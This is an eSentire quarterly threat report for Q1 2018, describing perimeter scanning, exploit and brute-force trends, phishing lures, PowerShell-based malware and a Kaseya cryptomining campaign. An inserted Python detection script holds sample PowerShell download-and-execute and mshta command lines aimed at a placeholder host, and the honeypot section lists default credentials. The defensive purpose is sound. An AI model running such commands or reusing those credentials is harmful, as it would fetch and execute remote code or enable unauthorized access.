Posted on 02-Oct-2018
QUARTERLY THREAT REPORT Q1 2018
Produced by eSentire Threat Intelligence
CONTENTS
PREFACE
EXECUTIVE SUMMARY
MOST VULNERABLE INDUSTRIES
THREAT TYPES OBSERVED
THREATS AT THE PERIMETER
THREATS BEYOND THE PERIMETER
TAKEAWAYS AND RECOMMENDATIONS
METHODOLOGY
ATTACHMENTS
PREFACE
eSentire invented a highly integrated technology stack that enables unparalleled visibility into our mid-market customer networks and agile, real-time threat response capabilities. This report provides a quarterly snapshot analyzing all events investigated by the eSentire SOC, addressing three topics: threat types, threat volume and attack types. Each topic is divided into multiple sections, including visual data analysis, written analysis, practical recommendations and key assumptions.
EXECUTIVE SUMMARY
This quarter saw a dramatic increase in attacks targeting consumer-grade routers, up 539% from Q4 2017. The majority of hostile detections on the eSentire threat detection surface pertain to perimeter threats: Information Gathering, Intrusion Attempts, and Reputation Blocks. eSentire Threat Intelligence assesses with medium confidence that these detections originate largely from automated scanning and exploitation attempts. Threats beyond the perimeter, Malicious Code (+35%) and Phishing (+39%), both increased in the first quarter of 2018.
Education, Construction, and Biotechnology were among the verticals that experienced the highest volume of hostile traffic, due to a high degree of consumer-grade router exploit attempts, brute forcing, and web server exploit attempts. This high threat volume likely indicates an over-exposed threat surface in these industries.
Data from esENDPOINT customers showed heavy use of legitimate Microsoft binaries such as PowerShell and MSHTA. These are popular tools for downloading and executing malicious code in the initial stages of a malware infection. PowerShell can also be leveraged by adversaries to reduce their on-disk footprint and evade detective controls by operating in memory and obfuscating command-line parameters. In January 2018, an unknown adversary was observed leveraging managed service providers and legitimate cloud services to access and deploy CryptoMining software in a campaign impacting multiple eSentire customers. The use of trusted service providers and cloud services successfully evaded detection at the network layer; the malicious activity was instead identified via anomaly detection at the endpoint layer.
MOST VULNERABLE INDUSTRIES
In the period from January 1 to March 31 this year, eSentire observed 830,000 potentially hostile events that resulted in 38,000 alerts sent to clients. After normalization by sensor count (see Methodology section) the top five affected industries included Education, Retail, Biotechnology, Construction, and Nonprofit Organizations (Figure 1).
Educational organizations on eSentire’s threat detection surface experienced a flurry of exploitation attempts in the first quarter. The majority of these detections were attributed to exploit attempts targeting consumer-grade routers. This does not indicate, with certainty, that vulnerable routers are present on the organization’s network. Rather, it suggests a higher exposure to automated opportunistic attacks among educational organizations on eSentire’s detection surface. Trending in router exploitations was first observed in late 2017, when the Reaper Botnet was gaining media attention. Router exploitation attempts continued to be observed through Q1 of 2018, with a 539% increase in observations from Q4 2017 to Q1 2018. Biotechnology experienced a wave of SSH Brute Force attempts as well as a variety of exploit attempts. Most of the vulnerabilities targeted by these exploits were dated between 2013 and 2016. For example, HeartBleed – a four-year-old vulnerability – is still being observed in the wild. Nonprofit organizations experienced several waves of traffic attempting to exploit the HeartBleed OpenSSL vulnerability. Retail organizations experienced a large degree of exploit attempts across different technologies with a focus on web servers. Many attacks targeted PHP or web server vulnerabilities. Construction organizations experienced similar exploit attempts against publicly facing web servers, as well as a variety of scanning activity and SSH brute force attempts.
The prevalence of brute force attacks and outdated exploit attempts implies that a high degree of automated, low-capability threats populates hostile internet traffic. These opportunistic threats are numerous but rarely successful; their low success rate is offset by their low operational cost.
Malicious Code incidents continue to favor email as a delivery vector, and PowerShell continues to be a popular tool for both opportunistic and targeted attacks. Data from esENDPOINT customers showed PowerShell usage was prevalent in confirmed Malicious Code incidents during the first quarter of 2018 (see Threats Beyond the Perimeter).
Figure 1: Top 5 industries experiencing verified hostile traffic (Education, Retail, Biotechnology, Nonprofit, Construction).
THREAT TYPES OBSERVED
The majority of traffic observed on eSentire’s threat detection surface (Figure 2) consists of Information Gathering (scans) and Intrusion Attempts (including both brute force and exploit attempts).
This traffic, along with the majority of Reputation Blocks, is often the result of automated and opportunistic attacks that constantly scan public IP ranges for vulnerable software, including OpenSSL, Apache Struts, and Drupal. Reputation Blocks result from eSentire blocking traffic from known hostile IP addresses. Information about known hostile IPs is acquired both from internal observations of attacks and from intelligence provided by external partners. Often these threats are related to Information Gathering or Intrusion Attempts, but they can also include malware distribution and command and control infrastructure (Malicious Code).
Any software executed on an endpoint that is used for malicious purposes can be classified as Malicious Code. This can often include banking trojans, RATs, CryptoMiners, and ransomware. Phishing attacks represent a lower volume of potentially hostile traffic compared to all other threat types. However, phishing attacks have a fairly consistent success rate (Figure 8) and can often lead to complete compromise of a network, if not addressed immediately.
Over the New Year, Intrusion Attempts grew 36% (Figure 3), due largely to exploitation of a DNS manipulation vulnerability in consumer-grade routers. These manipulations can allow attackers to redirect victims to malicious infrastructure to achieve a variety of results, including malware and phishing landing pages. Other exploits focused on consumer-grade routers.
Successful phishing attacks rose from 102 in Q4 2017 to 130 in Q1 2018 (Figure 8). A spike in Malicious Code events for the quarter resulted from activity generated by malicious documents, Kovter and the Android Batmob.b AdWare. Information Gathering dropped over the New Year due to a dramatic decline in SSH scans.
Figure 2: Distribution of threat types seen in potentially hostile traffic (Intrusion Attempt 44.17%, Reputation Block 25.41%, Information Gathering 23.10%, Malicious Code 5.46%, Phishing 1.85%).
Figure 3: Quarter over quarter change in threat type volume.

Threat Type             2017 Q4    2018 Q1    % Change
Phishing                 10.0K      14.0K       +39%
Intrusion Attempt       242.4K     328.9K       +36%
Malicious Code           30.0K      40.6K       +35%
Reputation Block        162.1K     166.7K        +3%
Unclassified              3.4K       3.4K        +1%
Information Gathering   169.4K     128.8K       -24%
THREATS AT THE PERIMETER
The majority of perimeter threats on eSentire’s detection surface originated from Intrusion Attempts (Figure 4), which were made up largely of exploit attempts and brute force attacks. The majority of exploit attempts targeted common web application software, while the majority of brute force attempts targeted remote access protocols, with SSH being the most popular target.
Exploit Attempts: Maintaining a consistent trend, Apache Struts continues to top the list with tens of thousands of exploit attempts detected for the quarter (Figure 5). At only thousands of attempts, targets like Oracle WebLogic, Bash and Ruby were also common. Shellshock, a Bash vulnerability, is another example of an outdated vulnerability that continued to see exploit attempts through Q1. Outdated, opportunistic attacks are rampant in the wild, waiting to be unleashed when security updates are delayed or out-of-date systems are exposed to the internet.
Figure 4: Attacks on the perimeter for the first quarter of 2018 (perimeter threat detections over time, January 7 to March 18, 2018, for Intrusion Attempt, Information Gathering and Reputation Block).
Figure 5: Most targeted software in Q1 of 2018 (Note: axis is logarithmic). Software shown: Drupal, IIS, SIP, Apache Tomcat, Nginx, Apache Struts, Ruby, WebLogic Server, Bash.
Scanning Tools: The most popular tools in the first quarter were the MuieBlackCat and ZmEu Scanners (Table 1), both of which attempt to find vulnerabilities in PHP-based web servers. OpenVAS and NMAP scanners were also popular tools, typically favored during the reconnaissance phase of an incident or campaign.
Brute Force Targets: When it comes to brute force attacks, SSH and Remote Desktop Protocol (RDP) are favored with some attempts on HTTP. FTP servers also saw a modest degree of attempts in Q1 (Table 2).
Top 10 SSH Brute Force Attempts: eSentire’s ThreatLab logs thousands of SSH brute force attacks per day, collecting information about login attempts, including username, password, and country of origin (Figure 6). Default usernames like ‘root’, ‘admin’, and ‘support’ and similarly basic passwords (including a blank or Null password) were popular. The majority of brute force attacks originated from infrastructure based in China, followed by the United States, Germany, and Russia.
Table 1: Most popular tools for Information Gathering (number of records per tool). Tools shown: Muieblackcat Scanner, OpenVAS Scanner, NMAP Scanner, ZmEu Scanner, Jorgee Scanner, Nessus Scanner, Muhstik, SIPVicious Scanner (VoIP), Masscan, NMAP Scripting Engine.
Table 2: Most popular protocols for Brute Force attacks (number of records per protocol): SSH, RDP, HTTP, Telnet, FTP.
Figure 6: Attempted credentials and source country of attacks on the eSentire honeypot. Top 10 usernames (unranked): root, admin, support, supervisor, Administrator, user, guest, Null, shell\x00, enable\x00. Top 10 passwords (unranked): admin, password, 123456, 12345, 1234, user, Null, 7ujMko0admin, sh\x00, system\x00. Top 10 source countries (unranked): CN, US, DE, RU, BR, IN, GR, MO, TW, VN.
THREATS BEYOND THE PERIMETER
A fraction of investigations into events inside the perimeter result in alerts on endpoint threats (Figure 7).
Threats that make it beyond the perimeter of an organization’s network can be costly, exposing data and critical business infrastructure. Malicious Code can arise from downloading and opening malicious documents, either from email or a web browser, but they can also be injected without user awareness following a successful exploit or intrusion. Organizations can also become compromised if the credentials of employees are accidentally shared with an attacker’s deceptive login page. Depending on the privileges allowed for the compromised user, a successful phishing attack could give an attacker considerable power over an organization’s infrastructure and data.
Figure 7: Attacks that have made it past the perimeter in the first quarter of 2018 (endpoint threat counts over time, January 7 to March 18, 2018, for Phishing and Malicious Code).
Perimeter attacks observed on eSentire’s threat detection surface suggest a high degree of low-effort, automated attacks targeting misconfigured software exposed to the public internet. While these attacks are rarely successful, their volume ensures that exposed, vulnerable systems will be quickly scanned and exploited. There is still a significant volume of attackers using more recent vulnerabilities, such as Apache Struts CVE-2017-5638 or the numerous PHP vulnerabilities, but they represent a smaller share of overall attacks. Similarly, the majority of brute force attacks appear to target default credentials left on devices that have been connected to the internet.
Opportunistic attacks at the perimeter seek out, and attempt to exploit, known vulnerabilities and weak configurations in externally facing services. Beyond the perimeter, the volume of threats originating from client endpoints is far smaller and includes Malicious Code and Phishing.
Phishing Lures: The most popular phishing lures used in Q1 of 2018 were DocuSign, Office 365, and OneDrive. Despite DocuSign being the most popular lure used overall (Figure 8, left), Office 365 had the best success rate, jumping to nearly five times that of the previous quarter (Figure 8, right).
Endpoint Threats: Across esENDPOINT customers, the most commonly detected threat in Q1 2018 was the execution of Malicious Code at 93% (Figure 9), followed by Active Intrusions (5%). Active Intrusions often involve an attacker interacting with the victim’s system through a shell initiated via a myriad of techniques, many of which overlap with Malicious Code. 91% of critical incidents detected via esENDPOINT involved known, legitimate binaries such as PowerShell or MSHTA. These processes are used by opportunistic and targeted threats alike, allowing them to circumvent basic controls to deliver and install malware.
Figure 8: Left: most popular phishing lures (Adobe, Apple, PayPal, TechSupport, DocuSign, Dropbox, OneDrive, Office 365), split by status (Fail/Success). Right: change in successful phishing attacks from quarter to quarter (2017 Q4 versus 2018 Q1) for Verizon, Adobe, Yahoo, Office 365, Chase, DocuSign, Dropbox, Apple and OneDrive.
Figure 9: Endpoint threats observed on eSentire’s detection surface (Malicious Code 93.21%, Active Intrusion 5.41%, Exploit Kit 1.35%).
Malicious Code: Incidents observed across esENDPOINT customers involved CryptoMiners (45%), Banking Trojans (32%) and, to a lesser extent, Credential Stealers (13%) and Ransomware (3%). At least 21% of Malicious Code incidents originated from Malicious Word documents.
Opportunistic actors continue to leverage PowerShell to retrieve and execute malicious code from remote sources, and PowerShell was a popular execution technique among Malicious Code incidents in Q1. Mainstream endpoint detection and response solutions enjoy widespread coverage of these execution techniques, meaning adversaries may become motivated to modify their tactics in the future. Several Malicious Code incidents observed in Q1 employed obfuscated PowerShell commands to impede analysis. These techniques are not new, but they make up a significant portion of endpoint detections, with 13% of observed incidents involving obfuscated command-line parameters. Analysts are often able to make inferences by examining the PowerShell actions that follow execution of obfuscated commands.
In addition to command-line obfuscation, use of Managed Service Providers (MSPs) for initial access and trusted cloud services for malware staging was also observed. In late January, an unknown adversary leveraged a flaw in Kaseya’s Virtual System Administrator (VSA) product to deploy CryptoMiners across a handful of eSentire clients. This attack leveraged trusted systems throughout its lifecycle, relying on Kaseya VSA endpoint agents for initial access via MSPs and on trusted cloud platforms for delivery of malicious scripts. The result was a CryptoMiner that operated in memory with multiple persistence mechanisms. Leveraging trusted IT and cloud systems ensured this attack went largely unnoticed by traditional detective controls; the threat was identified by esENDPOINT via process behavior monitoring. Kaseya was notified of the intrusions, resulting in multiple security fixes.
Figure 10: Types of Malicious Code events detected on endpoints (CryptoMiner 45.16%, Banking Trojan 32.26%, Credential Stealer 12.90%, HTA JavaScript Downloader 6.45%, Ransomware 3.23%).
TAKEAWAYS AND RECOMMENDATIONS
There are several actions that, when taken, can protect business networks from compromise.
Protect against vulnerability exploitation
While successful exploitation of older vulnerabilities is uncommon, the prevalence of opportunistic intrusion attempts in the wild means that administrators should be mindful when exposing systems to untrusted networks. Devices should be checked often to ensure they are hardened with secure hardware and software configurations.
Protect against router compromise
• Confirm that network infrastructure devices are properly configured and up to date with security patches
• Ensure all default passwords for network infrastructure devices have been changed
• Limit access to management interfaces
Revisit organizational awareness training programs to protect against phishing
Employees become the last line of defense when email filtering or malware detection systems fail to block phishing attacks. User education and security encouragement are primary factors in the prevention of successful phishing attacks. It is advised that user education programs be tested regularly to validate their effectiveness.
Protect against opportunistic threats like PowerShell-based attacks
Follow these 6 key steps to guard against covert attacks like PowerShell:
1. Log PowerShell activity across the network
   • Enable the logging function via Group Policy
   • Centralize and compare logs against known attack method signatures. Gaining visibility into network connections established by PowerShell processes is a simple, yet highly effective method for detecting modern malware
2. Block Word document macros. Average users do not need to execute Word document macros received in their email inbox. Blocking macros reduces the overall attack surface.
3. Enforce user education. Malware attacks often require user interaction in the initial phases of infection. As such, educating staff about ongoing threats is an important step in preventing successful attacks.
4. Restrict privileges. Some scripts require administrative privilege to run; therefore, restricting user privileges based on user requirements reduces the potential impact of compromise.
5. Implement application whitelisting. Application whitelisting is an effective control for preventing unapproved software from being executed. It involves maintaining an active list of approved software, which can generate additional overhead, meaning it may not be a cost-effective solution for some organizations.
6. Maintain up-to-date antivirus defenses. Maintaining up-to-date antivirus programs that contain the latest heuristics and signature-based rules can assist in detecting the latest threats. Other endpoint solutions can be employed and include EDR, HIDS, and NextGen antivirus.
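Detection logic for the "log PowerShell activity" step above, as an added example that is not part of eSentire's report or tooling. It assumes centralised process-creation and network-connection records with Sysmon-style field names (Image, CommandLine, DestinationIp) and flags the encoded or obfuscated command lines, download cradles and external PowerShell connections the report describes; every record and hostname in it is constructed.

```python
"""Added example (not eSentire's code): triage PowerShell process and network
records as the report's logging recommendation describes, comparing centralised
logs against known attack-method indicators. Every record below is constructed."""
import base64
import ipaddress
import re

# Known attack-method indicators: download cradles and evasion switches.
INDICATORS = {
    "download_cradle": re.compile(r"Net\.WebClient|DownloadString|DownloadFile|"
                                  r"Invoke-WebRequest|\bIWR\b|\bIEX\b|Invoke-Expression", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "no_profile": re.compile(r"-nop(rofile)?\b", re.I),
    "mshta": re.compile(r"\bmshta(\.exe)?\b", re.I),
}
# -e / -ec / -enc / -EncodedCommand followed by base64 of UTF-16LE script text.
ENCODED = re.compile(r"-e(c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
INTERNAL = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12",
            "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]  # internal ranges

def decode_encoded(cmdline):
    """Decoded -EncodedCommand payload, or None if absent or not valid base64."""
    m = ENCODED.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(2), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def obfuscation_score(text):
    """Count cheap tricks (backticks, carets, [char], '+'-split strings) hiding keywords."""
    return (text.count("`") + text.count("^")
            + len(re.findall(r"\[char\]", text, re.I))
            + len(re.findall(r"['\"]\s*\+\s*['\"]", text)))

def triage(record):
    """Classify one process-creation record: indicator hits plus a severity."""
    cmd = record.get("CommandLine", "")
    decoded = decode_encoded(cmd)
    visible = cmd if decoded is None else cmd + "\n" + decoded
    hits = [name for name, rx in INDICATORS.items() if rx.search(visible)]
    if decoded is not None:
        hits.append("encoded_command")
    score = obfuscation_score(visible)
    if "download_cradle" in hits or "mshta" in hits:
        severity = "high"      # remote code retrieval or execution
    elif hits or score >= 3:
        severity = "medium"    # evasion switches or heavy obfuscation
    else:
        severity = "low"
    return {"host": record.get("Host"), "severity": severity,
            "hits": hits, "obfuscation": score, "decoded": decoded}

def powershell_external_connections(records):
    """(host, ip, port) for network records where PowerShell reached outside INTERNAL."""
    out = []
    for r in records:
        if not r.get("Image", "").lower().endswith("powershell.exe"):
            continue
        ip = ipaddress.ip_address(r["DestinationIp"])
        if not any(ip in net for net in INTERNAL):
            out.append((r["Host"], str(ip), r["DestinationPort"]))
    return out

# Constructed samples; example.invalid and 203.0.113.x are documentation placeholders.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/m.ps1')"
ENC = base64.b64encode(CRADLE.encode("utf-16-le")).decode()
SAMPLE_PROCESSES = [
    {"Host": "ws01", "Image": PS, "CommandLine": "powershell.exe -NoProfile -w hidden -enc " + ENC},
    {"Host": "ws02", "Image": PS, "CommandLine": "powershell.exe Get-ChildItem C:\\Logs | Measure-Object"},
    {"Host": "ws03", "Image": r"C:\Windows\System32\mshta.exe", "CommandLine": "mshta.exe http://example.invalid/launch.hta"},
    {"Host": "ws04", "Image": PS, "CommandLine": "powershell.exe i`e`x ('Get'+'-Da'+'te')"},
]
SAMPLE_NETWORK = [
    {"Host": "ws01", "Image": PS, "DestinationIp": "203.0.113.10", "DestinationPort": 443},
    {"Host": "ws02", "Image": PS, "DestinationIp": "10.0.0.5", "DestinationPort": 445},
]
```

Record ws04 shows why the obfuscation score matters: the backtick-split "i`e`x" defeats the IEX signature, so only the score raises it above "low".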
METHODOLOGY
Industry Comparisons are made using data normalized by sensor count. Sensor count serves as a measure of company size. It follows that the sum of sensors for all companies in an industry approximates the scope of coverage for each industry. Normalizing the number of events in each industry by this number, then, gives an impression of attack intensity per area of detection surface.
Threats at the Perimeter: A time series representation of the volume of all detections originating from scans (Information Gathering), Intrusion Attempts, and Reputation Blocks, regardless of whether the detection merited an alert to the client.
Threats Beyond the Perimeter: A time series representation of the volume of alerts sent on Malicious Code and Phishing events, generated from known hostile threats as indicated by the SOC’s notes on investigation conclusions. Software targeted and exploit tools used are based on metadata associated with detections.
Phishing Lures are recorded in a case management system as phishing incidents are observed on eSentire’s threat detection surface. The SOC maintains a record of whether phishing credentials were submitted or not, allowing differentiation between successful and failed attempts.
Endpoint Detection data was interpreted from partial records for which broader context was not available due to retention limits. This accounted for approximately half of Malicious Code detections, which were removed from the data set for Figure 10. The other half was categorized based on event metadata and analyst notes.
ATTACHMENTS
Attachment 1: Threat Signals Normalization Taxonomy (based on the eCSIRT.net taxonomy)

Threat Signals Type Normalization Schema (Threat Type / Sub Type / Description and Examples)

Malicious Code
  Sub types: Virus, Worm, Trojan, Spyware, Ransomware, Rootkit, ...
  Any malicious software that is intentionally included or inserted in a system for a harmful purpose. A user interaction is normally necessary to activate the code.

Information Gathering
  Scanning: Attacks that send requests to a system to discover weak points. This also includes some kinds of testing processes to gather information about hosts, services and accounts. Examples: fingerd, DNS querying, ICMP, SMTP (EXPN, RCPT, ...).
  Sniffing: Observing and recording network traffic (wiretapping).
  Social Engineering: Gathering information from a human being in a non-technical way (eg, lies, tricks, bribes, or threats).

Intrusion Attempts
  Exploiting known vulnerabilities: An attempt to compromise a system or to disrupt any service by exploiting vulnerabilities with a standardised identifier such as a CVE name (eg, buffer overflow, backdoors, cross-site scripting, etc).
  Login attempts: Multiple login attempts (guessing / cracking of passwords, brute force).
  New attack signature: A network intrusion attempt using an unknown exploit.

Availability
  Sub types: DoS, DDoS, Sabotage, Outage (no malice)
  By this kind of attack a system is bombarded with so many packets that operations are delayed or the system crashes. DoS examples are ICMP and SYN floods, Teardrop attacks and mail-bombing. DDoS is often based on DoS attacks originating from botnets, but other scenarios also exist, such as DNS Amplification attacks. However, availability can also be affected by local actions (destruction, disruption of power supply, etc.) or by spontaneous failures or human error, without malice or gross neglect being involved.

Fraud
  Unauthorized use of resources: Using resources for unauthorized purposes including profit-making ventures (eg, the use of e-mail to participate in illegal profit chain letters or pyramid schemes).
  Copyright: Selling or installing copies of unlicensed commercial software or other copyright protected materials (Warez).
  Masquerade: Types of attacks in which one entity illegitimately assumes the identity of another in order to benefit from it.
  Phishing: Masquerading as another entity in order to persuade the user to reveal a private credential.

Unclassified
  All incidents which do not fit in one of the given categories should be put into this class. If the number of incidents in this category increases, it is an indicator that the classification scheme must be revised.

Policy Violation
  Unauthorized Applications: Skype, P2P, SMTP, FTP, ...
  Remote Access: SSH, LogMeIn, RDP, TeamViewer, ...
  Proxy/Tunnel: Proxy, TOR, ...
  Any incident resulting from violation of an organization’s acceptable usage policies by an authorized user.

Reputation Block
  Known bad indicator: Block/detection based on a known bad indicator, but without other validation or attribution to other incident types.

Source: https://www.enisa.europa.eu/topics/csirt-cert-services/community-projects/existing-taxonomies
Attachment 2: Confidence Language Used
Confidence language expresses the analyst’s judgment on the probability, or likelihood, that a certain event will occur under defined circumstances, considering the cumulative quality of information that supports an assessment.
• Certainly: 100% or (10/10) chances that a certain event will occur under defined circumstances.
• Highly Probable: 93% ±6% or (8/10) chances that a certain event will occur under defined circumstances.
• Probable: 75% or (7/10) chances that a certain event will occur under defined circumstances.
• Plausible: 50% or (5/10). Chances are even.
• Probably not: 30% ±10% or (3/10) chances that a certain event will occur under defined circumstances.
• Almost Certainly not: 7% ±5% or (1/10) chances that a certain event will occur under defined circumstances.
eSentire is the largest pure-play Managed Detection and Response (MDR) service provider, keeping organizations safe from constantly evolving cyber-attacks that technology alone cannot prevent. Its 24x7 Security Operations Center (SOC), staffed by elite security analysts, hunts, investigates, and responds in real-time to known and unknown threats before they become business-disrupting events. Protecting more than $6 trillion in corporate assets, eSentire absorbs the complexity of cybersecurity, delivering enterprise-grade protection and the ability to comply with growing regulatory requirements. For more information, visit www.eSentire.com and follow @eSentire.